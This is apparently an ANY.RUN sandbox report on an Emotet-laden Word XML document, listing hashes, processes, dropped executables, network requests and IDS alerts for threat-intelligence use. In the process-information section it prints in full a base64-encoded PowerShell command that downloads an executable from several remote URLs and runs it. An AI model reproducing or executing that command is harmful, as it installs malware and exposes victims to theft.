analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

US1690230194492646444.doc

Full analysis: https://app.any.run/tasks/094c397b-77a2-455b-89a8-a09d4e12643d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: February 11, 2019, 06:56:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
opendir
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

ED673A2E62C0A7B4B4798FEE5C03740E

SHA1:

814AD77D20B5AC6A5F0915CCF647234BF85DDCFE

SHA256:

53B0784F219135BC4164DC3B89F39B421863E7282C50D1955B13DD559CFA3370

SSDEEP:

3072:fSTBCe6+NcSDZjgRtjvIOzdksMGA8zfI/oEQ9gjjRWjIkYqLjL/xSu90OoiLuDKm:f2N9IbIydQGAuYQGgjtzxUOmD+XfwL7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2560)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2560)

    • Application was dropped or rewritten from another process

      • 776.exe (PID: 3060)
      • 776.exe (PID: 2056)
      • turnedavatar.exe (PID: 2724)
      • turnedavatar.exe (PID: 2660)

    • Emotet process was detected

      • turnedavatar.exe (PID: 2724)

    • Downloads executable files from the Internet

      • Powershell.exe (PID: 2888)

  • SUSPICIOUS

    • Creates files in the user directory

      • Powershell.exe (PID: 2888)

    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 2888)
      • 776.exe (PID: 2056)

    • Application launched itself

      • 776.exe (PID: 3060)

    • Reads the machine GUID from the registry

      • Powershell.exe (PID: 2888)

    • Starts itself from another location

      • 776.exe (PID: 2056)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2560)

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 2560)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2560)

    • Dropped object may contain Bitcoin addresses

      • Powershell.exe (PID: 2888)
      • 776.exe (PID: 2056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRT:
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://H4DbuISpwPOIS
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://H4DbuISpwPOIS
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 002F49D9
WordDocumentBodySectPRsidRDefault: 008F337A
WordDocumentBodySectPRsidR: 008F337A
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 135864 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: UD6Cnwl
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 12
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 12
WordDocumentDocumentPropertiesWords: 1
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:02:08 21:40:00Z
WordDocumentDocumentPropertiesCreated: 2019:02:08 21:40:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 776.exe no specs 776.exe #EMOTET turnedavatar.exe no specs turnedavatar.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2560"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\US1690230194492646444.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.5123.5000
2888Powershell -e JABwAFoAQgBrAFgARwBuAD0AKAAnAHQAOQA1AG0AaAByACcAKwAnAFoARQAnACkAOwAkAFQAQgB3AEEATgBwAGoAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFQARwBIAGMAWAA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACcALwAvAGsAJwArACcAdQByAHoAYQBsAC4AcgAnACsAJwB1AC8AJwArACcAdwBvAHIAZAAnACsAJwBwAHIAZQBzACcAKwAnAHMALwB3ACcAKwAnAHAAJwArACcALQBjAG8AbgB0AGUAbgB0ACcAKwAnAC8AdQBwACcAKwAnAGwAbwAnACsAJwBhAGQAJwArACcAcwAvAGMAJwArACcAegB0ADcAJwArACcAWQBkAFQAaQAzAHIAJwArACcAWgBWACcAKwAnAF8AcABhADcAJwArACcAQABoAHQAdAAnACsAJwBwADoALwAvAGwAYQBiACcAKwAnAHQAZQAnACsAJwByAHAAYQBkAHUALgB1AGwAbQAnACsAJwAuAGEAYwAnACsAJwAuACcAKwAnAGkAZAAvADcAJwArACcANwBnACcAKwAnAEwAbAAnACsAJwA2AEgAJwArACcANgBxAFAAQABoAHQAdABwADoAJwArACcALwAnACsAJwAvAGQAdQBrAGUAbgAnACsAJwAuAGsAegAvAFMAJwArACcATwAnACsAJwBIACcAKwAnAE0AbABNAHYAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAJwArACcAOgAnACsAJwAvACcAKwAnAC8AYwBvAG0AcABlAHgALQBvAG4AbABpAG4AZQAnACsAJwAuACcAKwAnAHIAJwArACcAdQAvADEAdgAzACcAKwAnAFAAJwArACcAcABQAEoAQQA2AEMAQABoAHQAJwArACcAdABwADoAJwArACcALwAvAG0AJwArACcAYQByAGsAZQAnACsAJwB0AGkAbgBnAG8AbgAnACsAJwBsAGkAJwArACcAbgBlAC4AdgBuAC8AdwBwACcAKwAnAC0AJwArACcAYQBkAG0AaQBuACcAKwAnAC8AUwBvAGoAYwAnACsAJwBsACcAKwAnAFkANwAnACsAJwBSAHMAbABhACcAKwAnAGIAJwArACcAbQBfACcAKwAnADQAMgAzAGwANgAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABTAEUARwBNAFQAbgBQAD0AKAAnAGIAJwArACcAZgBpAG4AJwArACcAWAA1AGkAMwAnACkAOwAkAHcAagBCAGsAbgBPACAAPQAgACgAJwA3ADcAJwArACcANgAnACkAOwAkAEkAcwBDAEoATwB3AGsAagA9ACgAJwBmACcAKwAnAGoATgB3AHQAWgAnACsAJwBxAE4AJwApADsAJABGAFEAVgBKADIARwB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGoAQgBrAG4ATwArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEYATQAzAGQAWQBSAFMAIABpAG4AIAAkAHoAVABHAEgAYwBYACkAewB0AHIAeQB7ACQAVABCAHcAQQBOAHAAagByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYATQAzAGQAWQBSAFMALAAgACQARgBRAFYASgAyAEcAdwApADsAJABHAHEAcwBrAEwAVABWAGoAPQAoACcAcQBuAEQAJwArACcAcgBRAG4AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARgBRAFYASgAyAEcAdwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAUQBWAEoAMgBHAHcAOwAkAHcAZgBEAHEAOQBHADUAMAA9ACgAJwBoAGYAegBwAEQARQBsACcAKwAnAGkAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHcANQBkAEQAMgBYADAAPQAoACcAYgBpACcAKwAnAEcAWAB0AE8ATgAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3060"C:\Users\admin\776.exe" C:\Users\admin\776.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2056"C:\Users\admin\776.exe"C:\Users\admin\776.exe
776.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2724"C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe"C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe
776.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2660"C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe"C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exeturnedavatar.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 851
Read events
1 305
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFD96.tmp.cvr
MD5:
SHA256:
2560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E2C9133.tmp
MD5:
SHA256:
2888Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HBOJRBYE7FKGSWIHEIJM.temp
MD5:
SHA256:
2888Powershell.exeC:\Users\admin\776.exeexecutable
MD5:A34CB7CE9E31490B6B52B0C712D232D5
SHA256:F1BFCAA158F166833E28DC7270166000284C3AC1ED35BE59EE79C3639DF46FA6
2888Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1c0eec.TMPbinary
MD5:F0B43C161C484A510A2FACA640F77C34
SHA256:51E790E773C2E1288194BD2A1609D7B39C5AFBB765EA3F79D0D0250A273247C0
2560WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:E4B0E6FECFD8DB1350FEFC8D2B449533
SHA256:839D9D8EA691C822F0AEB017A82C2A23B5C29A95D072B923FA24E68337318344
2560WINWORD.EXEC:\Users\admin\Desktop\~$1690230194492646444.docpgc
MD5:0D02CA90C0318A5A69EA247C53D7BE60
SHA256:A81665FA3C3278DAD2414CAEF6EC8DFC2C098C234B9CBEC1A67D1B0D7573DF24
2888Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:F0B43C161C484A510A2FACA640F77C34
SHA256:51E790E773C2E1288194BD2A1609D7B39C5AFBB765EA3F79D0D0250A273247C0
2056776.exeC:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exeexecutable
MD5:A34CB7CE9E31490B6B52B0C712D232D5
SHA256:F1BFCAA158F166833E28DC7270166000284C3AC1ED35BE59EE79C3639DF46FA6
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:CEB11FE08496D349D3D69A6F6D55BE30
SHA256:99175AA3016599F535B4E71C832F8AE0F39CCE4A947E6F637A9EF950F6D7C91C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2888
Powershell.exe
GET
200
213.79.113.120:80
http://kurzal.ru/wordpress/wp-content/uploads/czt7YdTi3rZV_pa7/
RU
executable
359 Kb
suspicious
2888
Powershell.exe
GET
301
213.79.113.120:80
http://kurzal.ru/wordpress/wp-content/uploads/czt7YdTi3rZV_pa7
RU
html
271 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2888
Powershell.exe
213.79.113.120:80
kurzal.ru
OJSC Comcor
RU
suspicious

DNS requests

Domain
IP
Reputation
kurzal.ru
  • 213.79.113.120
suspicious

Threats

PID
Process
Class
Message
2888
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2888
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2888
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
US1690230194492646444.doc